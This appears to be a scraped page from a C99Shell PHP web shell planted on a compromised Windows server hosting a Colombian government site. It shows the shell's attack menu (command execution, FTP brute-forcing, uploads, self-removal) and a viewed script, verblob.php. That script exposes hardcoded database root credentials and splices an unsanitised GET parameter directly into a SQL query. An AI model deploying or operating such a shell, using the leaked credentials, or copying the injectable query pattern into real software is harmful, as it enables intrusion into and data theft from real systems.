!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\Tomemos_Conciencia\fotos\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     verblob.php (1.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    error_reporting
(E_ALL);
    
$DBHOST="localhost";
    
$DBNAME="imagenes";
    
$DBUSER="root";
    
$DBPASSWORD"admin";
    
    
// Parámetros para recuperar la imagen
    # Recuperamos el parámetro GET con el id único de la foto que queremos mostrar
    
$idfoto = (isset($_GET["idfoto"])) ? $_GET["idfoto"] : exit();
    
# Recuperamos el parámetro GET para elegir entre la miniatura o la foto real
    
$tam = (isset($_GET["tam"])) ? $_GET["tam"] : 1;
    
    
// Escojemos la foto real o la miniatura según la variable $tam
    
switch($tam) {
        case 
"1":
            
$campo "foto";break;;
        case 
"2":
            
$campo "thumb";break;;
        default:
            
$campo "foto";break;;
    }
    
    
// Recuperamos la foto de la tabla
    
$sql "SELECT $campo, mime
            FROM tabla 
            WHERE idfoto = 
$idfoto";
            
    
# Conexión a la base de datos
    
$link mysql_connect($DBHOST$DBUSER$DBPASSWORD) or die(mysql_error($link));;
    
mysql_select_db($DBNAME$link) or die(mysql_error($link));
    
    
$conn mysql_query($sql$link) or die(mysql_error($link));
    
$datos mysql_fetch_array($conn);
    
    
// La imagen
    
$imagen $datos[0];
    
// El mime type de la imagen
    
$mime $datos[1];
    
    
// Gracias a esta cabecera, podemos ver la imagen 
    // que acabamos de recuperar del campo blob
    
header("Content-Type: $mime");
    
// Muestra la imagen
    
echo $imagen;    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--